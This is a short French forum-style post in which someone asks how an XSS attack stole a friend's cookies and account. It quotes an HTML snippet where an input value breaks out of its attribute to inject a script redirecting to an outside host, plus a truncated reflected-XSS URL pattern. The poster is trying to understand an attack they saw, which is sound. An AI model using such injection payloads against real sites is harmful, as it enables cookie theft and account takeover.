j'aurai voulut qu'on m'explique le fonctionnement d'un bout de code html dans l'exploitation d'une faille XSS ou le mec récupère les cookies.
Le bout de code de l'url : http://blabla.free.fr
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" >
<head>
<meta name="description" content="" />
<div><input id="searchBox" name="search" autocomplete="off" role="textbox" aria-autocomplete="list" aria-haspopup="true" class="input_search" type="hidden" value='</div><script>document.location="http://blabla.free.fr/</script>'/>
<center><input type="image" src="image.jpg" class="submit" value="Go !" /></div></center>
</form>
</div>
</body>
</html>
J'arrive pas à comprendre ce que ce code fait, mais un ami c'est fait avoir en étant redirigé sur ce site, et le mec qui lui a envoyé un message avec une url bidouillée je pense a récupéré son compte via ses cookies sur un autre site.La faille sur l'autre site est du style : http://www.site.com/page.php?titre="><s ... .location=.....
Merci.